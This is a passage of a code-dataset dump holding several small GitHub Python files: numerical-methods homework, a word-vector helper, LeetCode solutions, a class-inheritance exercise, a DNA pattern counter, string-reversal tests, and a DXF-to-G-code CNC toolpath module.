max_hata = input('Maksimum Hata:')\n max_iter = input('Maksimum iterasyon sayısı')\n\n x0 = float(x0)\n max_hata = float(max_hata)\n max_iter = int(max_iter)\n\n print(lab_odev1.my_newton(x0, max_hata, max_iter))\n\nelif choice == 3:\n xl = input('İlk Tahmin: ')\n xh = input('İkinci Tahmin:')\n max_hata = input('Maksimum Hata:')\n max_iter = input('Maksimum iterasyon sayısı')\n\n xl = float(xl)\n xh = float(xh)\n max_hata = float(max_hata)\n max_iter = int(max_iter)\n\n print(lab_odev1.my_secant(xl, xh, max_hata, max_iter))\n\nelse:\n print(\"Hatalı işlem numarası girdiniz!\")","repo_name":"mithatcanbursali/numericalanalysishomework","sub_path":"lab_odev1_test.py","file_name":"lab_odev1_test.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14575102389","text":"import numpy as np\nimport theano\nimport nnb\n\ndef is_number(s):\n try:\n float(s)\n return True\n except ValueError:\n pass\n return False\n\ndef is_year(s):\n return s.isdigit() and 1800 <= int(s) <= 2030\n\nclass WordVecsHelper:\n def __init__(self, lower=True):\n self.word_vecs = None\n self.word2index = None\n self.counter = {}\n self.lower = lower\n\n def add_sentences(self, sentences):\n for sentence in sentences:\n for word in sentence:\n token = word\n if self.lower:\n token = word.lower()\n if is_year(token) or is_number(token):\n continue\n if token not in self.counter:\n self.counter[token] = 0\n self.counter[token] += 1\n\n def create(self, dim, threshold=0):\n word2index = {}\n word2index['NUMBER'] = 0\n word2index['YEAR'] = 1\n word2index['UNK'] = 2\n num_words = 3\n\n for token in self.counter:\n if self.counter[token] <= threshold:\n continue\n if is_year(token):\n token = 'YEAR'\n elif is_number(token):\n token = 'NUMBER'\n\n if token not in word2index:\n word2index[token] = num_words\n num_words += 1\n\n\n word_vecs = nnb.rng.normal(\n loc=0,\n scale=1.0,\n size=(num_words, dim)\n )\n self.word_vecs = word_vecs/10\n self.word2index = word2index\n return word_vecs,word2index\n\n def translate_word(self, s):\n if self.lower:\n s = s.lower()\n\n if is_year(s):\n s = 'YEAR'\n elif is_number(s):\n s = 'NUMBER'\n if s not in self.word2index:\n s = 'UNK'\n\n return self.word2index[s]\n \n def translate(self, l):\n if isinstance(l, str):\n return self.translate_word(l)\n\n r = []\n for s in l:\n r.append(self.translate_word(s))\n\n return r\n\n def read_file(self, filename, separator='\\t'):\n line_counts = 1\n word_dim = None\n with open(filename) as fin:\n line = fin.readline()\n splits = line.split(separator)\n word_dim = len(splits) - 1\n for line in fin:\n line_counts += 1\n\n\n #UNK\n line_counts += 1\n word_vecs = np.empty(\n shape=(line_counts, word_dim),\n dtype=theano.config.floatX\n )\n word_vecs[0, :] = nnb.rng.normal(loc=0., scale=1., size=(1, word_dim)) / 10\n\n word2index = {}\n word2index['UNK'] = 0\n with open(filename) as fin:\n for line in fin:\n splits = line.split(separator)\n token = splits[0]\n vec = map(float, splits[1:])\n word_vecs[len(word2index), :] = vec\n word2index[token] = len(word2index)\n\n self.word2index = word2index\n self.word_vecs = word_vecs\n\n return word_vecs, word2index\n","repo_name":"NNBlocks/NNBlocks","sub_path":"nnb/utils/word_vecs.py","file_name":"word_vecs.py","file_ext":"py","file_size_in_byte":3108,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"26216639781","text":"# https://leetcode.com/problems/largest-submatrix-with-rearrangements/\n# requires a bit thinking\n\nclass Solution:\n def largestSubmatrix(self, matrix: List[List[int]]) -> int:\n a = matrix\n n, m = len(a), len(a[0])\n\n for j in range(m):\n cur = 0\n for i in range(n):\n if a[i][j] == 1:\n a[i][j] += cur\n else:\n a[i][j] = 0\n cur = a[i][j]\n\n res = 0\n for i in range(n):\n a[i].sort()\n for j in range(m):\n res = max(res, (m - j) * a[i][j])\n\n return res\n","repo_name":"zhuli19901106/leetcode-zhuli","sub_path":"algorithms/1501-2000/1727_largest-submatrix-with-rearrangements_1_AC.py","file_name":"1727_largest-submatrix-with-rearrangements_1_AC.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","stars":557,"dataset":"github-code","pt":"72"} +{"seq_id":"38136513884","text":"class Plant():\n def __init__(self):\n self._class='parent of all plants'\n self._name='no name'\n self._akar=None\n self._batang=None\n self._daun=None\n self._identity=''\n\n def constructIdentity(self):\n self._identity='Hi, I\\'m '+self._class+'. My name is '+self._name\n return self._identity\n\n def showIdentity(self):\n print(self.constructIdentity())\n\nclass Monocotyle(Plant):\n def __init__(self):\n super().__init__()\n self._class='Monocotyle'\n self._akar='serabut'\n self._batang='no cambium'\n self._daun='tidak menyirip'\n\n def constructIdentity(self):\n self._identity=super().constructIdentity()+'. I have '+self._akar+' root, '+self._batang+' stem, and '+self._daun+' leaf'\n return self._identity\n\nclass Dicotyle(Plant):\n def __init__(self):\n super().__init__()\n self._class='Dicotyle'\n self._akar='tunggang'\n self._batang='cambium'\n self._daun='menyirip'\n\n def constructIdentity(self):\n self._identity=super().constructIdentity()+'. I have '+self._akar+' root, '+self._batang+' stem, and '+self._daun+' leaf'\n return self._identity\n\nclass Vegetative(Monocotyle):\n def __init__(self,name):\n super().__init__()\n self._class='Vegetative'\n self._reproduction='spora'\n self._name=name\n\n def constructIdentity(self):\n self._identity=super().constructIdentity()+'. I reproduce with '+self._reproduction\n return self._identity\n\nclass Generative(Monocotyle):\n def __init__(self, name):\n super().__init__()\n self._class='Generative'\n self._reproduction='flower'\n self._name=name\n\n def constructIdentity(self):\n self._identity=super().constructIdentity()+'. I reproduce with '+self._reproduction\n return self._identity\n\nclass FlowerPlant(Dicotyle):\n def __init__(self,name):\n super().__init__()\n self._class='Flower Plant'\n self._accessories='flower'\n self._name=name\n\n def constructIdentity(self):\n self._identity=super().constructIdentity()+'. I have '+self._accessories+' as my accessories'\n return self._identity\n\nclass FruitPlant(Dicotyle):\n def __init__(self, name):\n super().__init__()\n self._class='Fruit Plant'\n self._accessories='fruit'\n self._name=name\n\n def constructIdentity(self):\n self._identity=super().constructIdentity()+'. I have '+self._accessories+' as my accessories'\n return self._identity\n\nlumut=Vegetative('lumut')\ncemara=Generative('cemara')\nmawar=FlowerPlant('mawar')\nmangga=FruitPlant('mangga')\n\nlumut.showIdentity()\ncemara.showIdentity()\nmawar.showIdentity()\nmangga.showIdentity()","repo_name":"SyamsulAlterra/Alta","sub_path":"OOP/Inheritance-Polymorphism/3-tumbuhan.py","file_name":"3-tumbuhan.py","file_ext":"py","file_size_in_byte":2770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27822701501","text":"def patternCount(sequence, pattern):\r\n sequence_size = len(sequence)\r\n pattern_size = len(pattern)\r\n count = 0\r\n for i in range(0,sequence_size-pattern_size+1):\r\n if sequence[i:i+pattern_size] == pattern:\r\n count+=1\r\n return count\r\n \r\n#start main\r\ngenome_file = open(\"pattern_count.txt\", \"r\")\r\n\r\nsequence = genome_file.readline()\r\npattern = genome_file.readline()\r\n\r\n\r\nprint(patternCount(sequence, pattern))\r\n\r\ngenome_file.close()\r\n","repo_name":"Bailey455/Bioinformatics","sub_path":"pattern_count.py","file_name":"pattern_count.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42620496494","text":"# Task 5\n# Write a program to reverse a string\nimport pytest\n\n\ndef reverse_string(message):\n if not message:\n raise Exception(\"String cannot be empty\")\n if not message.isascii():\n raise Exception(\"String cannot be digits or other special characters\")\n tmp = message.split(\" \")\n return \" \".join(tmp[::-1])\n\n\ndef test_reverse_string():\n input_string = \"How are you?\"\n expected_value = \"you? are How\"\n assert reverse_string(input_string) == expected_value\n\n\ndef test_reverse_string_empty():\n input_string = \"\"\n with pytest.raises(Exception):\n reverse_string(input_string)\n\n\ndef test_reverse_string_with_bool():\n message = True\n with pytest.raises(Exception):\n reverse_string(message)\n","repo_name":"xurten/python-and-csharp-coding-interview-tasks","sub_path":"python_tests/test_5_reverse_string.py","file_name":"test_5_reverse_string.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11116558623","text":"from __future__ import print_function\nimport math\nimport gcode_cmd\nimport cnc_drill\nimport cnc_pocket\nimport cnc_boundary\nimport dxfgrabber\nimport networkx\nimport numpy\nimport shapely.geometry.polygon as polygon\nimport matplotlib.pyplot as plt\n\nfrom geom_utils import dist2D\nfrom graph_utils import getEntityGraph\nfrom dxf_utils import getEntityStartAndEndPts\n\nclass DxfBase(gcode_cmd.GCodeProg):\n\n ALLOWED_TYPE_LIST = None\n DEFAULT_PARAM = {'dxfTypes': []}\n\n def __init__(self,param):\n self.param = dict(self.DEFAULT_PARAM)\n self.param.update(param)\n try:\n self.dwg = self.param['dwg']\n except KeyError:\n self.dwg = dxfgrabber.readfile(self.param['fileName'])\n self.makeListOfCmds()\n\n @property\n def layerNameList(self):\n try:\n layerNameList = self.param['layers']\n except KeyError:\n layerNameList = [layer.name for layer in self.dwg.layers]\n return layerNameList\n\n @property\n def entityList(self):\n entityList = [x for x in self.dwg.entities if x.layer in self.layerNameList]\n entityList = [x for x in entityList if x.dxftype in self.param['dxfTypes']] \n entityList = [x for x in entityList if x.dxftype in self.ALLOWED_TYPE_LIST]\n return entityList\n\n\nclass DxfDrill(DxfBase):\n\n ALLOWED_TYPE_LIST = ['POINT', 'CIRCLE', 'ARC']\n DEFAULT_PARAM = {\n 'dxfTypes' : ['CIRCLE'],\n 'startCond' : 'minX',\n }\n\n def __init__(self,param):\n super(DxfDrill,self).__init__(param)\n\n @property\n def drillClass(self):\n if 'stepZ' in self.param:\n drill = cnc_drill.PeckDrill\n else:\n drill = cnc_drill.SimpleDrill\n return drill \n\n def getCenterPt(self,entity):\n if entity.dxftype == 'POINT':\n centerPt = entity.point\n else:\n centerPt = entity.center \n return centerPt\n\n def makeListOfCmds(self):\n self.listOfCmds = []\n # ------------------------------------------------------------------------\n # Note: for better efficiency it might be worth while sorting the entities\n # based on some criteria .....distance, etc.\n # -------------------------------------------------------------------------\n for entity in self.entityList:\n drillParam = dict(self.param)\n centerPt = self.getCenterPt(entity)\n drillParam['centerX'] = centerPt[0]\n drillParam['centerY'] = centerPt[1]\n drill = self.drillClass(drillParam)\n self.listOfCmds.extend(drill.listOfCmds)\n\n\nclass DxfCircPocket(DxfBase):\n\n ALLOWED_TYPE_LIST = ['CIRCLE']\n DEFAULT_PARAM = {'dxfTypes': ['CIRCLE']}\n\n def __init__(self,param):\n super(DxfCircPocket,self).__init__(param)\n\n def makeListOfCmds(self):\n self.listOfCmds = []\n for entity in self.entityList:\n pocketParam = dict(self.param)\n pocketParam['centerX'] = entity.center[0]\n pocketParam['centerY'] = entity.center[1]\n pocketParam['radius'] = entity.radius\n if 'thickness' in pocketParam:\n pocket = cnc_pocket.CircAnnulusPocketXY(pocketParam)\n else:\n pocket = cnc_pocket.CircPocketXY(pocketParam)\n self.listOfCmds.extend(pocket.listOfCmds)\n\n\nclass DxfRectPocketFromExtent(DxfBase):\n\n ALLOWED_TYPE_LIST = ['LINE','POINT']\n DEFAULT_PARAM = {\n 'dxfTypes' : ['LINE','POINT'],\n 'ptEquivTol' : 1.0e-5,\n 'components' : True,\n }\n\n def __init__(self,param):\n super(DxfRectPocketFromExtent,self).__init__(param)\n\n def makeListOfCmds(self):\n self.listOfCmds = []\n if self.param['components']:\n # Get entity graph and find connected components\n graph, ptToNodeDict = getEntityGraph(self.entityList,self.param['ptEquivTol'])\n connectedCompSubGraphs = networkx.connected_component_subgraphs(graph)\n # Create list of commands for each connected component individually\n for i, subGraph in enumerate(connectedCompSubGraphs):\n entityList = [subGraph[n][m]['entity'] for n, m in subGraph.edges()]\n self.listOfCmds.extend(self.makeListOfCmdsForEntityList(entityList))\n else:\n self.listOfCmds.extend(self.makeListOfCmdsForEntityList(self.entityList))\n\n def makeListOfCmdsForEntityList(self,entityList):\n \"\"\"\n Generates rectangular pocket from extent of entities in the given list.\n \"\"\"\n coordList = []\n for entity in entityList:\n if entity.dxftype == 'LINE':\n coordList.append(entity.start[:2])\n coordList.append(entity.end[:2])\n elif entity.dxftype == 'POINT':\n coordList.append(entity.point[:2])\n else:\n raise RuntimeError('dxftype {0} not supported yet'.format(entity.dxftype))\n\n # Get x and y coordinates max and min values\n xCoordList = [p[0] for p in coordList]\n yCoordList = [p[1] for p in coordList]\n xMax = max(xCoordList)\n xMin = min(xCoordList)\n yMax = max(yCoordList)\n yMin = min(yCoordList)\n\n # Calculate center, width and height\n centerX = 0.5*(xMax + xMin)\n centerY = 0.5*(yMax + yMin)\n width = xMax - xMin\n height = yMax - yMin\n\n # Create list of commands\n pocketParam = dict(self.param)\n pocketParam['centerX'] = centerX\n pocketParam['centerY'] = centerY\n pocketParam['width'] = width\n pocketParam['height'] = height\n if 'thickness' in pocketParam:\n pocket = cnc_pocket.RectAnnulusPocketXY(pocketParam)\n else:\n pocket = cnc_pocket.RectPocketXY(pocketParam)\n return pocket.listOfCmds \n\n\nclass DxfRectBoundaryFromExtent(DxfBase):\n\n ALLOWED_TYPE_LIST = ['LINE','POINT']\n DEFAULT_PARAM = {\n 'dxfTypes' : ['LINE','POINT'],\n 'ptEquivTol' : 1.0e-5,\n 'components' : True,\n }\n\n def __init__(self,param):\n super(DxfRectBoundaryFromExtent,self).__init__(param)\n\n def makeListOfCmds(self):\n self.listOfCmds = []\n if self.param['components']:\n # Get entity graph and find connected components\n graph, ptToNodeDict = getEntityGraph(self.entityList,self.param['ptEquivTol'])\n connectedCompSubGraphs = networkx.connected_component_subgraphs(graph)\n # Create list of commands for each connected component individually\n for i, subGraph in enumerate(connectedCompSubGraphs):\n entityList = [subGraph[n][m]['entity'] for n, m in subGraph.edges()]\n self.listOfCmds.extend(self.makeListOfCmdsForEntityList(entityList))\n else:\n self.listOfCmds.extend(self.makeListOfCmdsForEntityList(self.entityList))\n\n def makeListOfCmdsForEntityList(self,entityList):\n \"\"\"\n Generates rectangular pocket from extent of entities in the given list.\n \"\"\"\n coordList = []\n for entity in entityList:\n if entity.dxftype == 'LINE':\n coordList.append(entity.start[:2])\n coordList.append(entity.end[:2])\n elif entity.dxftype == 'POINT':\n coordList.append(entity.point[:2])\n else:\n raise RuntimeError('dxftype {0} not supported yet'.format(entity.dxftype))\n\n # Get x and y coordinates max and min values\n xCoordList = [p[0] for p in coordList]\n yCoordList = [p[1] for p in coordList]\n xMax = max(xCoordList)\n xMin = min(xCoordList)\n yMax = max(yCoordList)\n yMin = min(yCoordList)\n\n # Calculate center, width and height\n centerX = 0.5*(xMax + xMin)\n centerY = 0.5*(yMax + yMin)\n width = xMax - xMin\n height = yMax - yMin\n\n # Create list of commands\n boundaryParam = dict(self.param)\n boundaryParam['centerX'] = centerX\n boundaryParam['centerY'] = centerY\n boundaryParam['width'] = width\n boundaryParam['height'] = height\n boundary = cnc_boundary.RectBoundaryXY(boundaryParam)\n return boundary.listOfCmds \n\n\nclass DxfCircBoundary(DxfBase):\n\n ALLOWED_TYPE_LIST = ['CIRCLE']\n DEFAULT_PARAM = {'dxfTypes': ['CIRCLE']}\n\n def __init__(self,param):\n super(DxfCircBoundary,self).__init__(param)\n\n def makeListOfCmds(self):\n self.listOfCmds = []\n for entity in self.entityList:\n bndryParam = dict(self.param)\n bndryParam['centerX'] = entity.center[0]\n bndryParam['centerY'] = entity.center[1]\n bndryParam['radius'] = entity.radius\n bndry = cnc_boundary.CircBoundaryXY(bndryParam)\n self.listOfCmds.extend(bndry.listOfCmds)\n\n\nclass DxfBoundary(DxfBase):\n\n ALLOWED_TYPE_LIST = ['LINE','ARC']\n DEFAULT_PARAM = {\n 'dxfTypes' : ['LINE','ARC'],\n 'convertArcs' : True,\n 'ptEquivTol' : 1.0e-5,\n 'maxArcLen' : 1.0e-2,\n 'startCond' : 'minX',\n }\n\n def __init__(self,param):\n super(DxfBoundary,self).__init__(param)\n\n def makeListOfCmds(self):\n self.listOfCmds = []\n # Get entity graph and find connected components\n graph, ptToNodeDict = getEntityGraph(self.entityList,self.param['ptEquivTol'])\n connectedCompSubGraphs = networkx.connected_component_subgraphs(graph)\n # Create list of commands for each connected component individually\n for i, subGraph in enumerate(connectedCompSubGraphs):\n nodeDegreeList = [subGraph.degree(n) for n in subGraph]\n maxNodeDegree = max(nodeDegreeList)\n minNodeDegree = min(nodeDegreeList)\n if maxNodeDegree > 2:\n # Graph is complicated - treat each entity as separate task \n for edge in subGraph.edges():\n edgeGraph = subGraph.subgraph(edge)\n listOfCmds = self.makeCmdsForLineString(edgeGraph)\n self.listOfCmds.extend(listOfCmds)\n elif maxNodeDegree == 2 and minNodeDegree == 2:\n # Graph is closed loop\n listOfCmds = self.makeCmdsForClosedLoop(subGraph)\n self.listOfCmds.extend(listOfCmds)\n elif minNodeDegree == 1:\n # Graph is line string\n listOfCmds = self.makeCmdsForLineString(subGraph)\n self.listOfCmds.extend(listOfCmds)\n else:\n errorMsg = 'sub-graph has nodes with degree 0'\n raise RuntimeError(errorMsg)\n \n\n def makeCmdsForLineString(self,graph):\n if self.param['cutterComp'] is not None:\n errorMsg = 'cutterComp must be None for line string graphs'\n raise RuntimeError(errorMsg)\n\n # Get start and end node based on startCond.\n endNodeList = [n for n in graph if graph.degree(n) == 1]\n if self.param['startCond'] in ('minX', 'maX'):\n endCoordAndNodeList = [(graph.node[n]['coord'][0],n) for n in endNodeList]\n elif self.param['startCond'] in ('minY', 'maxY'):\n endCoordAndNodeList = [(graph.node[n]['coord'][1],n) for n in endNodeList]\n else:\n raise ValueError('unknown startCond {0}'.format(self.param['startCond']))\n endCoordAndNodeList.sort()\n if 'min' in self.param['startCond']:\n startNode = endCoordAndNodeList[0][1]\n endNode = endCoordAndNodeList[1][1]\n else:\n startNode = endCoordAndNodeList[1][1]\n endNode = endCoordAndNodeList[0][1]\n\n # Get path from start to end node (there is only one)\n simplePathGen = networkx.all_simple_paths(graph, startNode,endNode)\n startToEndPath = simplePathGen.next()\n\n # Get list of segments (line or arc) along path and create cnc commands\n segList = self.getSegListFromPath(startToEndPath, graph)\n param = dict(self.param)\n param['closed'] = False \n listOfCmds = self.makeListOfCmdsFromSegList(segList,param)\n return listOfCmds\n\n def makeCmdsForClosedLoop(self,graph):\n # Get start and end nodes based on startCond\n if self.param['startCond'] in ('minX', 'maxX'):\n coordAndNodeList = [(graph.node[n]['coord'][0], n) for n in graph]\n elif self.param['startCond'] in ('minY', 'maxY'):\n coordAndNodeList = [(graph.node[n]['coord'][1], n) for n in graph]\n else:\n raise ValueError('unknown startCond {0}'.format(self.param['startCond']))\n coordAndNodeList.sort()\n if 'min' in self.param['startCond']:\n startNode = coordAndNodeList[0][1]\n else:\n startNode = coordAndNodeList[-1][1]\n endNode = list(graph.neighbors(startNode))[0]\n\n # Get path around graph\n simplePathList = [p for p in networkx.all_simple_paths(graph,startNode,endNode)]\n lenAndSimplePathList = [(len(p),p) for p in simplePathList]\n closedPath = max(lenAndSimplePathList)[1]\n closedPath.append(startNode)\n closedPathCoord = [graph.node[n]['coord'] for n in closedPath]\n\n\n ## ==============================================\n ## DEBUG\n ## ==============================================\n #xvals = [x for x,y in closedPathCoord]\n #yvals = [y for x,y in closedPathCoord]\n #plt.plot(xvals,yvals)\n #plt.show()\n ## ==============================================\n\n lineString = polygon.LineString(closedPathCoord)\n # Test for self instersections and if none orient closed loop for cutting direction\n if not lineString.is_simple:\n if self.param['cutterComp'] is not None:\n raise RuntimeError('cutterComp is not allowed for non-simple closed loops')\n cutterComp = None\n else:\n linearRing = polygon.LinearRing(closedPathCoord)\n cwTest = self.param['direction'] == 'cw' and linearRing.is_ccw\n ccwTest = self.param['direction'] == 'ccw' and not linearRing.is_ccw\n if cwTest or ccwTest:\n closedPath.reverse()\n closedPathCoord.reverse()\n\n cutterComp = self.param['cutterComp']\n if cutterComp in ('inside', 'outside'):\n cutterCompTable = {\n ('inside', 'ccw') : 'left',\n ('inside', 'cw') : 'right',\n ('outside', 'ccw') : 'right',\n ('outside', 'cw') : 'left',\n }\n cutterComp = cutterCompTable[(cutterComp,self.param['direction'])]\n\n # Get list of segments (line or arc) along path and create cnc commands\n segList = self.getSegListFromPath(closedPath,graph)\n param = dict(self.param)\n param['closed'] = True \n param['cutterComp'] = cutterComp\n listOfCmds = self.makeListOfCmdsFromSegList(segList,param)\n return listOfCmds\n\n def makeListOfCmdsFromSegList(self,segList,param):\n listOfCmds = []\n if self.param['convertArcs']:\n pointList = [p[0] for p in segList]\n pointList.append(segList[-1][1])\n param['pointList'] = pointList \n boundary = cnc_boundary.LineSegBoundaryXY(param)\n listOfCmds = boundary.listOfCmds\n else:\n raise RuntimeError('convertArcs=False not supported yet')\n\n #xList = [p[0] for p in pointList]\n #yList = [p[1] for p in pointList]\n #plt.plot(xList[:78],yList[:78],'.')\n #plt.axis('equal')\n #plt.show()\n\n return listOfCmds\n\n def getSegListFromPath(self, nodePath, graph):\n segList = []\n for node0, node1 in zip(nodePath[:-1],nodePath[1:]):\n startCoord = graph.node[node0]['coord']\n endCoord = graph.node[node1]['coord']\n edgeEntity = graph[node0][node1]['entity']\n if edgeEntity.dxftype == 'LINE':\n segList.append((startCoord, endCoord))\n else: \n if self.param['convertArcs']:\n arcSegList = self.convertDxfArcToLineList(edgeEntity)\n if dist2D(arcSegList[0][0],startCoord) > self.param['ptEquivTol']:\n arcSegList = [(y,x) for x,y in arcSegList[::-1]]\n segList.extend(arcSegList)\n else:\n raise RuntimeError('convertArcs=False not supported yet')\n return segList\n\n\n def getEntityLineList(self):\n lineList = []\n for entity in self.entityList:\n if entity.dxftype == 'LINE':\n line = entity.start[:2], entity.end[:2]\n lineList.append(line)\n else:\n arcLineList = self.convertDxfArcToLineList(entity)\n lineList.extend(arcLineList)\n return lineList\n \n\n def convertDxfArcToLineList(self,arc):\n xc = arc.center[0]\n yc = arc.center[1]\n r = arc.radius\n try:\n angStart = (math.pi/180.0)*arc.start_angle\n except AttributeError:\n angStart = (math.pi/180.0)*arc.startangle\n\n try:\n angEnd = (math.pi/180.0)*arc.end_angle\n except AttributeError:\n angEnd = (math.pi/180.0)*arc.endangle\n \n # Get array of steps from start to end angle\n if angEnd < angStart:\n angEnd += 2.0*math.pi \n totalAng = abs(angEnd - angStart)\n maxStepAng = self.param['maxArcLen']/arc.radius\n numPts = int(math.ceil(totalAng/maxStepAng))\n angStepArray = numpy.linspace(angStart, angEnd, numPts)\n # Create line segments\n lineList = []\n for ang0, ang1 in zip(angStepArray[:-1], angStepArray[1:]):\n x0 = xc + r*math.cos(ang0)\n y0 = yc + r*math.sin(ang0)\n x1 = xc + r*math.cos(ang1)\n y1 = yc + r*math.sin(ang1)\n lineSeg = ((x0,y0), (x1,y1))\n lineList.append(lineSeg)\n return lineList\n\n\n\n## Utility functions\n## -----------------------------------------------------------------------------\n#def getEntityGraph(entityList, ptEquivTol=1.0e-6):\n# ptToNodeDict = getPtToNodeDict(entityList,ptEquivTol)\n# graph = networkx.Graph()\n# for entity in entityList:\n# startPt, endPt = getEntityStartAndEndPts(entity)\n# startNode = ptToNodeDict[startPt]\n# graph.add_node(startNode,coord=startPt)\n# endNode = ptToNodeDict[endPt]\n# graph.add_node(endNode,coord=endPt)\n# graph.add_edge(startNode, endNode, entity=entity)\n# for edge in graph.edges():\n# # Remove any trivial edges - perhaps due to drawing errors?\n# if edge[0] == edge[1]:\n# graph.remove_edge(*edge)\n# return graph, ptToNodeDict\n#\n#def getPtToNodeDict(entityList, ptEquivTol=1.0e-6):\n# ptList = []\n# for entity in entityList:\n# startPt, endPt = getEntityStartAndEndPts(entity)\n# ptList.extend([startPt, endPt])\n# ptToNodeDict = {}\n# nodeCnt = 0\n# for i, p in enumerate(ptList):\n# found = False\n# for q in ptList[:i]:\n# if dist2D(p,q) < ptEquivTol:\n# found = True\n# ptToNodeDict[p] = ptToNodeDict[q] \n# break\n# if not found:\n# ptToNodeDict[p] = nodeCnt\n# nodeCnt += 1\n# return ptToNodeDict\n\n#def getDxfArcStartAndEndPts(arc): \n# xc = arc.center[0]\n# yc = arc.center[1]\n# r = arc.radius\n# angStart = (math.pi/180.0)*arc.startangle\n# angEnd = (math.pi/180.0)*arc.endangle\n# if angEnd < angStart:\n# angEnd += 2.0*math.pi \n# x0 = xc + r*math.cos(angStart)\n# y0 = yc + r*math.sin(angStart)\n# x1 = xc + r*math.cos(angEnd)\n# y1 = yc + r*math.sin(angEnd)\n# startPt = x0,y0\n# endPt = x1,y1\n# return startPt,endPt\n#\n#\n#def getEntityStartAndEndPts(entity):\n# if entity.dxftype == 'LINE':\n# startPt, endPt = entity.start[:2], entity.end[:2]\n# elif entity.dxftype == 'ARC':\n# startPt, endPt = getDxfArcStartAndEndPts(entity)\n# else:\n# raise RuntimeError('entity type not yet supported')\n# return startPt, endPt\n\n\n\n\n# -----------------------------------------------------------------------------\nif __name__ == '__main__':\n\n import os\n\n prog = gcode_cmd.GCodeProg()\n prog.add(gcode_cmd.GenericStart())\n prog.add(gcode_cmd.Space())\n prog.add(gcode_cmd.FeedRate(120.0))\n\n dxfDir = os.path.join(os.curdir,'test_dxf')\n\n if 0:\n fileName = os.path.join(dxfDir,'drill_test.dxf')\n param = { \n 'fileName' : fileName,\n 'startZ' : 0.02,\n 'stopZ' : -0.5,\n 'safeZ' : 0.5,\n 'stepZ' : 0.05,\n 'startDwell' : 2.0,\n }\n drill = DxfDrill(param)\n prog.add(drill)\n\n\n if 0:\n fileName = os.path.join(dxfDir,'drill_test.dxf')\n param = { \n 'fileName' : fileName,\n 'layers' : ['layer1'],\n 'dxfTypes' : ['CIRCLE'],\n 'startZ' : 0.02,\n 'stopZ' : -0.5,\n 'safeZ' : 0.5,\n 'stepZ' : 0.05,\n 'startDwell' : 2.0,\n }\n drill = DxfDrill(param)\n prog.add(drill)\n\n if 1:\n #fileName = os.path.join(dxfDir, 'circ_boundary_test0.dxf')\n fileName = os.path.join(dxfDir, 'circ_boundary_test1.dxf')\n param = {\n 'fileName' : fileName,\n 'layers' : ['layer1', 'layer2'],\n 'depth' : 0.2,\n 'startZ' : 0.0,\n 'safeZ' : 0.15,\n 'toolDiam' : 0.25,\n 'cutterComp' : 'inside',\n 'direction' : 'ccw',\n 'maxCutDepth' : 0.03,\n 'startDwell' : 2.0,\n }\n boundary = DxfCircBoundary(param)\n prog.add(boundary)\n\n if 0:\n fileName = os.path.join(dxfDir,'circ_pocket_test.dxf')\n param = {\n 'fileName' : fileName,\n 'depth' : 0.4,\n 'startZ' : 0.0,\n 'safeZ' : 0.5,\n 'overlap' : 0.1,\n 'overlapFinish' : 0.1,\n 'maxCutDepth' : 0.2,\n 'toolDiam' : 0.25,\n 'direction' : 'ccw',\n 'startDwell' : 2.0,\n }\n pocket = DxfCircPocket(param)\n prog.add(pocket)\n\n\n if 0:\n fileName = os.path.join(dxfDir,'rect_extent_test0.dxf')\n param = {\n 'fileName' : fileName,\n 'components' : False,\n 'depth' : 2*0.04,\n 'startZ' : 0.0,\n 'safeZ' : 0.5,\n 'overlap' : 0.3,\n 'overlapFinish' : 0.5,\n 'maxCutDepth' : 0.04,\n 'toolDiam' : 0.25,\n 'cornerCut' : False,\n 'direction' : 'ccw',\n 'startDwell' : 2.0,\n }\n pocket = DxfRectPocketFromExtent(param)\n prog.add(pocket)\n\n\n if 0:\n fileName = os.path.join(dxfDir,'rect_extent_test1.dxf')\n param = {\n 'fileName' : fileName,\n 'components' : True,\n 'depth' : 2*0.04,\n 'startZ' : 0.0,\n 'safeZ' : 0.5,\n 'overlap' : 0.3,\n 'overlapFinish' : 0.5,\n 'maxCutDepth' : 0.04,\n 'toolDiam' : 0.25,\n 'cornerCut' : False,\n 'direction' : 'ccw',\n 'startDwell' : 2.0,\n }\n pocket = DxfRectPocketFromExtent(param)\n prog.add(pocket)\n\n if 0:\n fileName = os.path.join(dxfDir,'circ_pocket_test.dxf')\n param = {\n 'fileName' : fileName,\n 'layers' : ['layer1'],\n 'depth' : 0.4,\n 'startZ' : 0.0,\n 'safeZ' : 0.5,\n 'overlap' : 0.1,\n 'overlapFinish' : 0.1,\n 'maxCutDepth' : 0.2,\n 'toolDiam' : 0.25,\n 'direction' : 'ccw',\n 'startDwell' : 2.0,\n }\n pocket = DxfCircPocket(param)\n prog.add(pocket)\n\n\n\n if 0:\n #fileName = os.path.join(dxfDir,'boundary_test0.dxf')\n fileName = os.path.join(dxfDir,'boundary_test1.dxf')\n #fileName = os.path.join(dxfDir,'boundary_test2.dxf')\n #fileName = os.path.join(dxfDir,'boundary_test3.dxf')\n #fileName = os.path.join(dxfDir,'boundary_test4.dxf')\n param = {\n 'fileName' : fileName,\n 'depth' : 0.03,\n 'startZ' : 0.0,\n 'safeZ' : 0.2,\n 'toolDiam' : 0.25,\n 'direction' : 'ccw',\n 'cutterComp' : None,\n 'maxCutDepth' : 0.03,\n 'startDwell' : 2.0,\n 'startCond' : 'minX',\n }\n boundary = DxfBoundary(param)\n prog.add(boundary)\n\n prog.add(gcode_cmd.Space())\n prog.add(gcode_cmd.End(),comment=True)\n print(prog)\n prog.write('test.ngc')\n","repo_name":"iorodeo/py2gcode","sub_path":"py2gcode/cnc_dxf.py","file_name":"cnc_dxf.py","file_ext":"py","file_size_in_byte":25728,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"71646707434","text":"\"\"\"\nGiven an array arr, replace every element in that array with the greatest element among \nthe elements to its right, and replace the last element with -1.\n\nAfter doing so, return the array.\n\nEXPLANATION:\n\nBrute force doesnt pass. Need to realize that 